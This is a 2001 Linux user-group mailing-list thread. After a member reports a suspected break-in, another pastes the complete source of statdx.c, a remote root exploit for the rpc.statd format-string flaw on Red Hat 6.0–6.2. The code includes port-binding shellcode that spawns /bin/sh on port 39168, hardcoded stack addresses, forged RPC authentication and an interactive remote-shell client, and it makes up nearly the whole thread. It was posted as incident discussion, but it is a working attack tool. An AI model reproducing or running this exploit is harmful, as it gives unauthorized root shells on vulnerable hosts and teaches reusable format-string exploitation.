cdowns wrote:
> cdowns wrote:
>
> > "Karl J. Runge" wrote:
> >
> > > On Mon, 19 Feb 2001, "Robert W. Fowler" <[EMAIL PROTECTED]> wrote:
> > > >
> > > > i think one of our machines got nailed just This morning with a
> > > > suspected named exploit....
> > > > i can post any info that ive found if anyone would like to examine it,
> > > > im still sifting through it myself.
> > > > Time to Wipe the disk
> > > > Rob
> > >
> > > Is the exploit connection TCP only, UDP only, or involves both?
> > >
> > > Thanks,
> > >
> > > Karl
> > >
> > > **********************************************************
> > > To unsubscribe from this list, send mail to
> > > [EMAIL PROTECTED] with the following text in the
> > > *body* (*not* the subject line) of the letter:
> > > unsubscribe gnhlug
> > > **********************************************************
> >
> > the exploit most likely used was statdx.c here is the source :
> >
> > -D
> >
> > /**
> > *** statdx
> > *** Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32)
> > *** by ron1n <[EMAIL PROTECTED]>
> > ***
> > *** August 3, 2000
> > *** Sydney, Australia
> > ***
> > *** Oh you prob'ly won't remember me
> > *** It's prob'ly ancient history
> > *** I'm one of the chosen few
> > *** Who went ahead and fell for you
> > ***
> > *** $ gcc -o statdx statdx.c ; ./statdx -h
> > ***
> > *** Thanks to smiler for the format string vulnerability clarification.
> > ***
> > *** background info
> > *** ---------------
> > *** rpc.statd is an ONC RPC server that implements the Network Status
> > *** Monitor RPC protocol to provide reboot notification. It is used by
> > *** the NFS file locking service (rpc.lockd) when it performs lock
> > *** recovery.
> > ***
> > *** Due to a format string vulnerability in a call to syslog() within
> > *** its logging module, rpc.statd can be exploited remotely by script
> > *** kids bent on breaking into your Redhat Linux box and defacing your
> > *** website with crackpot political musings.
> > ***
> > *** This is not a traditional buffer overflow vulnerability. The data
> > *** are kept within the bounds of the buffer by means of a call to
> > *** vsnprintf(). The saved return address can be overwritten indirectly
> > *** without a contiguous payload. syslog() is given, for the most part,
> > *** a user-supplied format string with no process-supplied arguments.
> > *** Our format string will, if carefully constructed, cause the process
> > *** to cull non-arbitrary addresses from the top of the stack for
> > *** sequential writes using controlled values. Exploitation requires
> > *** an executable stack on the target host -- almost invariably the
> > *** case. This problem was corrected in the nfs-utils-0.1.9.1 rpm.
> > ***
> > *** exploit info
> > *** ------------
> > *** You have one shot at this in most situations, so get it right!
> > ***
> > *** If you know the port number rpc.statd is serving requests on, you
> > *** can supply the port number on the commandline to bypass the initial
> > *** portmapper query. This is very useful for hosts which are filtering
> > *** inbound connections to the portmapper. The default attack protocol
> > *** is UDP. There is a commandline option to use TCP. Apparently, the
> > *** dispatcher uses both protocols by default.
> > ***
> > *** If you're only interested in exploiting a host, then you can safely
> > *** skip the following information. You'll only need a buffer address
> > *** to get started. This buffer address will either be one of my canned
> > *** ones or your own one. It must be precise, and this is where you're
> > *** likely to experience difficulties with your attacks.
> > ***
> > *** [va_list][str][4][r][4][r+1][4][r+2][4][r+3]----->
> > *** | |
> > *** %esp buffer[1024]
> > ***
> > *** [%8x..][%!x][%n][%!x][%n][%!x][%n][%!x][%n][sc]--->
> > *** | r | r+1 | r+2 | r+3 |
> > ***
> > *** buffer -> This is the address you'll need (-a and -l options)
> > *** str -> Process-supplied string; 24 bytes long
> > *** 4 -> Duplicate dwords to satisfy the %!d specifiers and
> > *** the double %n when two successive values are equal
> > *** r -> Stack position of saved eip
> > *** %8x.. -> Wipes the va_list dword and str; 9 by default (-w option)
> > *** %!x -> Used for padding to form an aggregate overwrite value;
> > *** the exclamation mark denotes a field width. This may
> > *** or may not be present, depending on the value. An
> > *** algorithm is used to allow tricky values.
> > *** %n -> Writes overwrite value to the corresponding address
> > *** sc -> Nops + portbinding shellcode (port 39168)
> > ***
> > *** Only modify the default wipe value and the default offset value if you
> > *** know what you're doing.
> > ***
> > *** An easy way to get the buffer address for simulation systems that you
> > *** have privileged access to:
> > ***
> > *** [term 1]# ltrace -p `pidof rpc.statd` -o foo
> > *** [term 2]$ ./statdx -a 0x41414141 localhost
> > *** [term 1]# grep vsnprintf foo | head -1 | sed 's/.*(//' | \
> > *** awk -F"," '{print $1}'
> > ***
> > *** (Of course, ensure that rpc.statd is started at boot time and not from
> > *** an interactive shell, otherwise it will inherit a larger environment
> > *** and blow the accuracy of your findings.)
> > ***
> > *** Ok, longwinded enough. Let's dance.
> > ***
> > *** greets
> > *** ------
> > *** ADM, attrition, rogues, security.is, teso
> > ***
> > **/
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <errno.h>
> > #include <unistd.h>
> > #include <netdb.h>
> > #include <rpc/rpc.h>
> > #include <sys/types.h>
> > #include <sys/time.h>
> > #include <sys/socket.h>
> > #include <netinet/in.h>
> >
> > #define SM_PROG 100024
> > #define SM_VERS 1
> > #define SM_STAT 1
> > #define SM_MAXSTRLEN 1024
> >
> > #define max(a,b) ((a)>(b)?(a):(b))
> >
> > #define NOP 0x90
> >
> > /*
> > ** Non-ripped linux IA32 portbinding shellcode.
> > ** port: 39168 ; length: 133 bytes
> > */
> >
> > char shellcode[] =
> > "\x31\xc0" /* xorl %eax,%eax */
> > /* jmp ricochet ------------------------------------------------------- */
> > "\xeb\x7c" /* jmp 0x7c */
> > /* kungfu: ------------------------------------------------------------ */
> > "\x59" /* popl %ecx */
> > "\x89\x41\x10" /* movl %eax,0x10(%ecx) */
> > /* ------------------------------------ socket(2,1,0); ---------------- */
> > "\x89\x41\x08" /* movl %eax,0x8(%ecx) */
> > "\xfe\xc0" /* incb %al */
> > "\x89\x41\x04" /* movl %eax,0x4(%ecx) */
> > "\x89\xc3" /* movl %eax,%ebx */
> > "\xfe\xc0" /* incb %al */
> > "\x89\x01" /* movl %eax,(%ecx) */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ bind(sd,&sockaddr,16); -------- */
> > "\xb3\x02" /* movb $0x2,%bl */
> > "\x89\x59\x0c" /* movl %ebx,0xc(%ecx) */
> > "\xc6\x41\x0e\x99" /* movb $0x99,0xe(%ecx) */
> > "\xc6\x41\x08\x10" /* movb $0x10,0x8(%ecx) */
> > "\x89\x49\x04" /* movl %ecx,0x4(%ecx) */
> > "\x80\x41\x04\x0c" /* addb $0xc,0x4(%ecx) */
> > "\x88\x01" /* movb %al,(%ecx) */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ listen(sd,blah); -------------- */
> > "\xb3\x04" /* movb $0x4,%bl */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ accept(sd,0,16); -------------- */
> > "\xb3\x05" /* movb $0x5,%bl */
> > "\x30\xc0" /* xorb %al,%al */
> > "\x88\x41\x04" /* movb %al,0x4(%ecx) */
> > "\xb0\x66" /* movb $0x66,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ dup2(cd,0); ------------------- */
> > "\x89\xce" /* movl %ecx,%esi */
> > "\x88\xc3" /* movb %al,%bl */
> > "\x31\xc9" /* xorl %ecx,%ecx */
> > "\xb0\x3f" /* movb $0x3f,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ dup2(cd,1); ------------------- */
> > "\xfe\xc1" /* incb %cl */
> > "\xb0\x3f" /* movb $0x3f,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ dup2(cd,2); ------------------- */
> > "\xfe\xc1" /* incb %cl */
> > "\xb0\x3f" /* movb $0x3f,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ execve("/bin/sh",argv,0); ----- */
> > "\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f,(%esi) */
> > "\xc7\x46\x04\x2f\x73\x68\x41" /* movl $0x4168732f,0x4(%esi) */
> > "\x30\xc0" /* xorb %al,%al */
> > "\x88\x46\x07" /* movb %al,0x7(%esi) */
> > "\x89\x76\x0c" /* movl %esi,0xc(%esi) */
> > "\x8d\x56\x10" /* leal 0x10(%esi),%edx */
> > "\x8d\x4e\x0c" /* leal 0xc(%esi),%ecx */
> > "\x89\xf3" /* movl %esi,%ebx */
> > "\xb0\x0b" /* movb $0xb,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ------------------------------------ exit(blah); ------------------- */
> > "\xb0\x01" /* movb $0x1,%al */
> > "\xcd\x80" /* int $0x80 */
> > /* ricochet: call kungfu ---------------------------------------------- */
> > "\xe8\x7f\xff\xff\xff"; /* call -0x81 */
> >
> > enum res
> > {
> > stat_succ,
> > stat_fail
> > };
> >
> > struct sm_name
> > {
> > char *mon_name;
> > };
> >
> > struct sm_stat_res
> > {
> > enum res res_stat;
> > int state;
> > };
> >
> > struct type
> > {
> > int type;
> > char *desc;
> > char *code;
> > u_long bufpos;
> > int buflen;
> > int offset;
> > int wipe;
> > };
> >
> > struct type types[] =
> > {
> > {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600,
> > 9},
> > {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
> >
> > {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9},
> >
> > {0, NULL, NULL, 0, 0, 0, 0}
> > };
> >
> > bool_t
> > xdr_sm_name(XDR *xdrs, struct sm_name *objp)
> > {
> > if (!xdr_string(xdrs, &objp->mon_name, SM_MAXSTRLEN))
> > return (FALSE);
> > return (TRUE);
> > }
> >
> > bool_t
> > xdr_res(XDR *xdrs, enum res *objp)
> > {
> > if (!xdr_enum(xdrs, (enum_t *)objp))
> > return (FALSE);
> > return (TRUE);
> > }
> >
> > bool_t
> > xdr_sm_stat_res(XDR *xdrs, struct sm_stat_res *objp)
> > {
> > if (!xdr_res(xdrs, &objp->res_stat))
> > return (FALSE);
> > if (!xdr_int(xdrs, &objp->state))
> > return (FALSE);
> > return (TRUE);
> > }
> >
> > void
> > usage(char *app)
> > {
> > int i;
> >
> > fprintf(stderr, "statdx by ron1n <[EMAIL PROTECTED]>\n");
> > fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);
> > fprintf(stderr, "\t[-o offset] [-w num] [-s secs] [-d type]
> > <target>\n");
> > fprintf(stderr, "-t\tattack a tcp dispatcher [udp]\n");
> > fprintf(stderr, "-p\trpc.statd serves requests on <port> [query]\n");
> > fprintf(stderr, "-a\tthe stack address of the buffer is <addr>\n");
> > fprintf(stderr, "-l\tthe length of the buffer is <len> [1024]\n");
> > fprintf(stderr, "-o\tthe offset to return to is <offset> [600]\n");
> > fprintf(stderr, "-w\tthe number of dwords to wipe is <num> [9]\n");
> > fprintf(stderr, "-s\tset timeout in seconds to <secs> [5]\n");
> > fprintf(stderr, "-d\tuse a hardcoded <type>\n");
> > fprintf(stderr, "Available types:\n");
> >
> > for(i = 0; types[i].desc; i++)
> > fprintf(stderr, "%d\t%s\n", types[i].type, types[i].desc);
> >
> > exit(EXIT_FAILURE);
> > }
> >
> > void
> > runshell(int sockd)
> > {
> > char buff[1024];
> > int fmax, ret;
> > fd_set fds;
> >
> > fmax = max(fileno(stdin), sockd) + 1;
> > send(sockd, "cd /; ls -alF; id;\n", 19, 0);
> >
> > for(;;)
> > {
> >
> > FD_ZERO(&fds);
> > FD_SET(fileno(stdin), &fds);
> > FD_SET(sockd, &fds);
> >
> > if(select(fmax, &fds, NULL, NULL, NULL) < 0)
> > {
> > perror("select()");
> > exit(EXIT_FAILURE);
> > }
> >
> > if(FD_ISSET(sockd, &fds))
> > {
> > bzero(buff, sizeof buff);
> > if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
> > {
> > perror("recv()");
> > exit(EXIT_FAILURE);
> > }
> > if(!ret)
> > {
> > fprintf(stderr, "Connection closed\n");
> > exit(EXIT_FAILURE);
> > }
> > write(fileno(stdout), buff, ret);
> > }
> >
> > if(FD_ISSET(fileno(stdin), &fds))
> > {
> > bzero(buff, sizeof buff);
> > ret = read(fileno(stdin), buff, sizeof buff);
> > errno = 0;
> > if(send(sockd, buff, ret, 0) != ret)
> > {
> > if(errno) perror("send()");
> > else fprintf(stderr, "Transmission loss\n");
> > exit(EXIT_FAILURE);
> > }
> > }
> > }
> > }
> >
> > void
> > connection(struct sockaddr_in host)
> > {
> > int sockd;
> >
> > host.sin_port = htons(39168);
> >
> > if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
> > {
> > perror("socket()");
> > exit(EXIT_FAILURE);
> > }
> >
> > if(!connect(sockd, (struct sockaddr *) &host, sizeof host))
> > {
> > printf("OMG! You now have rpc.statd technique!@#$!\n");
> > runshell(sockd);
> > }
> >
> > close(sockd);
> > }
> >
> > char *
> > wizardry(char *sc, u_long bufpos, int buflen, int offset, int wipe)
> > {
> > int i, j, cnt, pad;
> > char pbyte, *buff, *ptr;
> > u_long retpos;
> > u_long dstpos;
> >
> > while(bufpos % 4) bufpos--;
> > /* buflen + ebp */
> > retpos = bufpos + buflen + 4;
> >
> > /*
> > ** 0x00 == '\0'
> > ** 0x25 == '%'
> > ** (add troublesome bytes)
> > ** Alignment requirements aid comparisons
> > */
> >
> > pbyte = retpos & 0xff;
> >
> > /* Yes, it's 0x24 */
> > if(pbyte == 0x00 || pbyte == 0x24)
> > {
> > fprintf(stderr, "Target address space contains a poison char\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > /*
> > ** Unless the user gives us a psychotic value,
> > ** the address should now be clean.
> > */
> >
> > /* str */
> > cnt = 24;
> > /* 1 = process nul */
> > buflen -= cnt + 1;
> >
> > if(!(buff = malloc(buflen + 1)))
> > {
> > perror("malloc()");
> > exit(EXIT_FAILURE);
> > }
> >
> > ptr = buff;
> > memset(ptr, NOP, buflen);
> >
> > for(i = 0; i < 4; i++, retpos++)
> > {
> > /* junk dword */
> > for(j = 0; j < 4; j++)
> > *ptr++ = retpos >> j * 8 & 0xff;
> > /* r + i */
> > memcpy(ptr, ptr - 4, 4);
> > ptr += 4; cnt += 8;
> > }
> >
> > /* restore */
> > retpos -= 4;
> >
> > for(i = 0; i < wipe; i++)
> > {
> > /* consistent calculations */
> > strncpy(ptr, "%8x", 3);
> > ptr += 3; cnt += 8;
> > }
> >
> > dstpos = bufpos + offset;
> >
> > /*
> > ** This small algorithm of mine can be used
> > ** to obtain "difficult" values..
> > */
> >
> > for(i = 0; i < 4; i++)
> > {
> > pad = dstpos >> i * 8 & 0xff;
> > if(pad == (cnt & 0xff))
> > {
> > sprintf(ptr, "%%n%%n");
> > ptr += 4; continue;
> > }
> > else
> > {
> > int tmp;
> > /* 0xffffffff = display count of 8 */
> > while(pad < cnt || pad % cnt <= 8) pad += 0x100;
> > pad -= cnt, cnt += pad;
> > /* the source of this evil */
> > tmp = sprintf(ptr, "%%%dx%%n", pad);
> > ptr += tmp;
> > }
> >
> > }
> >
> > *ptr = NOP;
> > /* plug in the shellcode */
> > memcpy(buff + buflen - strlen(sc), sc, strlen(sc));
> > buff[buflen] = '\0';
> >
> > printf("buffer: %#lx length: %d (+str/+nul)\n", bufpos, strlen(buff));
> > printf("target: %#lx new: %#lx (offset: %d)\n", retpos, dstpos,
> > offset);
> > printf("wiping %d dwords\n", wipe);
> > return buff;
> > }
> >
> > struct in_addr
> > getip(char *host)
> > {
> > struct hostent *hs;
> >
> > if((hs = gethostbyname(host)) == NULL)
> > {
> > herror("gethostbyname()");
> > exit(EXIT_FAILURE);
> > }
> >
> > return *((struct in_addr *) hs->h_addr);
> > }
> >
> > int
> > main(int argc, char **argv)
> > {
> > int ch;
> > char *buff;
> >
> > CLIENT *clnt;
> > enum clnt_stat res;
> > struct timeval tv, tvr;
> > struct sm_name smname;
> > struct sm_stat_res smres;
> > struct sockaddr_in addr;
> >
> > int type = -1;
> > int usetcp = 0;
> > int timeout = 5;
> > int wipe = 9;
> > int offset = 600;
> > int buflen = 1024;
> > char *target;
> > char *sc = shellcode;
> > u_short port = 0;
> > u_long bufpos = 0;
> >
> > int sockp = RPC_ANYSOCK;
> >
> > extern char *optarg;
> > extern int optind;
> > extern int opterr;
> > opterr = 0;
> >
> > while((ch = getopt(argc, argv, "tp:a:l:o:w:s:d:")) != -1)
> > {
> > switch(ch)
> > {
> > case 't': usetcp = 1; break;
> > case 'p': sscanf(optarg, "%hu", &port); break;
> > case 'a': sscanf(optarg, "%lx", &bufpos); break;
> > case 'l': buflen = atoi(optarg); break;
> > case 'o': offset = atoi(optarg); break;
> > case 's': timeout = atoi(optarg); break;
> > case 'w': wipe = atoi(optarg); break;
> > case 'd': type = atoi(optarg); break;
> > default : usage(argv[0]);
> > }
> > }
> >
> > if(!(target = argv[optind]))
> > {
> > fprintf(stderr, "No target host specified\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > if(type >= 0)
> > {
> > if(type >= sizeof types / sizeof types[0] - 1)
> > {
> > fprintf(stderr, "Invalid type\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > sc = types[type].code;
> > bufpos = types[type].bufpos;
> > buflen = types[type].buflen;
> > offset = types[type].offset;
> > wipe = types[type].wipe;
> > }
> >
> > if(!bufpos)
> > {
> > fprintf(stderr, "No buffer address specified\n");
> > exit(EXIT_FAILURE);
> > }
> >
> > bzero(&addr, sizeof addr);
> > addr.sin_family = AF_INET;
> > addr.sin_port = htons(port);
> > addr.sin_addr = getip(target);
> >
> > tv.tv_sec = timeout;
> > tv.tv_usec = 0;
> >
> > if(!usetcp)
> > {
> > clnt = clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
> > if(clnt == NULL)
> > {
> > clnt_pcreateerror("clntudp_create()");
> > exit(EXIT_FAILURE);
> > }
> > tvr.tv_sec = 2;
> > tvr.tv_usec = 0;
> > clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
> > }
> > else
> > {
> > clnt = clnttcp_create(&addr, SM_PROG, SM_VERS, &sockp, 0, 0);
> > if(clnt == NULL)
> > {
> > clnt_pcreateerror("clnttcp_create()");
> > exit(EXIT_FAILURE);
> > }
> > }
> >
> > /* AUTH_UNIX / AUTH_SYS authentication forgery */
> > clnt->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
> >
> > buff = wizardry(sc, bufpos, buflen, offset, wipe);
> > smname.mon_name = buff;
> >
> > res = clnt_call(clnt, SM_STAT, (xdrproc_t) xdr_sm_name,
> > (caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res,
> > (caddr_t) &smres, tv);
> >
> > if(res != RPC_SUCCESS)
> > {
> > clnt_perror(clnt, "clnt_call()");
> > printf("A timeout was expected. Attempting connection to
> > shell..\n");
> > sleep(5); connection(addr);
> > printf("Failed\n");
> > }
> > else
> > {
> > printf("Failed - statd returned res_stat: (%s) state: %d\n",
> > smres.res_stat ? "failure" : "success", smres.state);
> > }
> >
> > free(buff);
> > clnt_destroy(clnt);
> > return -1;
> > }
>
> **********************************************************
> To unsubscribe from this list, send mail to
> [EMAIL PROTECTED] with the following text in the
> *body* (*not* the subject line) of the letter:
> unsubscribe gnhlug
> **********************************************************
whoops i was thinking nfs stuff sorry, anyway this is in the loose right now.
-D
**********************************************************
To unsubscribe from this list, send mail to
[EMAIL PROTECTED] with the following text in the
*body* (*not* the subject line) of the letter:
unsubscribe gnhlug
**********************************************************
